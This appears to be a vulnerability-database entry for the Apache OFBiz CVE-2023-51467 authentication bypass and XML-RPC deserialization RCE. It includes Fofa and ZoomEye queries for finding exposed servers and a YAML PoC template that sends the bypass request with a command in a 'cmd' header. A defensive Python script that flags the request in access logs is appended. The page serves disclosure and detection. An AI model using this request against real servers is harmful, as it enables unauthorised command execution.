apache-ofbiz-CVE-2023-51467-xmlrpc-rce: Apache ofbiz CVE-2023-51467 xmlrpc RCE

Date: 2025-09-01 | Affected software: Apache OFBiz | PoC: public

Vulnerability description

Detects Apache OFBiz CVE-2023-51467, an authentication bypass that leads to command execution through XML-RPC deserialization.
Fofa: app="Apache_OFBiz"
ZoomEye: app:"Apache OFBiz"

PoC code [public]

id: apache-ofbiz-CVE-2023-51467-xmlrpc-rce

info:
  name: Apache ofbiz CVE-2023-51467 xmlrpc RCE
  author: JaneMandy
  severity: critical
  verified: true
  description: |
    Detecting Apache OFBiz - CVE-2023-51467 authentication bypass vulnerability, xmlrpc deserialization command execution exploit
    Fofa: app="Apache_OFBiz"
    ZoomEye: app:"Apache OFBiz"
  reference:
    - https://mp.weixin.qq.com/s/GfGb048u9VedzM2FhBJz8Q
    - https://stack.chaitin.com/vuldb/detail/2dbae0cb-0292-45ee-a66d-a2567b11b257
  tags: apache,ofbiz,rce,xmlrpc
  created: 2023/12/30

rules:
  r0:
    request:
      method: POST
      headers:
        Content-Type: application/xml
        cmd: "echo \"Apache-5201314-Apache\""
      path: /webtools/control/xmlrpc/?USERNAME=&PASSWORD=admin&requirePasswordChange=Y
      body: <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">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</serializable></value></member></struct></value></param></params></methodCall>
    expression: response.status == 200 && response.body.bcontains(b'Apache-5201314-Apache')
expression: r0()
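As an added defensive example that is not part of the original PoC, the following Python scans web-server access logs for the authentication-bypass request shape used above: the /webtools/control/xmlrpc endpoint called with requirePasswordChange=Y (and, in the PoC, an empty USERNAME). The sample log lines and the regex for the request field are constructed assumptions, not data from the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original page), in the
# common "method target protocol" layout of a Tomcat/Apache access log.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Sep/2025:10:00:01 +0000] "POST /webtools/control/xmlrpc/?USERNAME=&PASSWORD=admin&requirePasswordChange=Y HTTP/1.1" 200 512
198.51.100.7 - - [01/Sep/2025:10:00:02 +0000] "POST /webtools/control/xmlrpc HTTP/1.1" 401 0
198.51.100.9 - - [01/Sep/2025:10:00:03 +0000] "GET /webtools/control/main?requirePasswordChange=Y HTTP/1.1" 302 0
192.0.2.4 - - [01/Sep/2025:10:00:04 +0000] "GET /control/login HTTP/1.1" 200 2048
"""

# Assumed log layout: the request line is quoted as "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_bypass_attempt(target: str) -> bool:
    """True when the request target matches the CVE-2023-51467 pattern from
    the PoC: the xmlrpc controller endpoint combined with
    requirePasswordChange=Y, which the login check mishandles."""
    parts = urlsplit(target)
    if not parts.path.rstrip("/").endswith("/webtools/control/xmlrpc"):
        return False
    query = parse_qs(parts.query, keep_blank_values=True)
    return any(v.upper() == "Y" for v in query.get("requirePasswordChange", []))


def scan_log(text: str) -> list:
    """Return one record per suspicious line: source IP, method, target, and
    whether USERNAME was present but empty (the exact shape of the PoC)."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or not is_bypass_attempt(m["target"]):
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        hits.append({
            "src": line.split(" ", 1)[0],
            "method": m["method"],
            "target": m["target"],
            "empty_username": query.get("USERNAME") == [""],
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

This only inspects the request line; the serialized XML-RPC payload travels in the POST body, so confirming an actual deserialization attempt needs body capture at a proxy or WAF rather than the access log.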
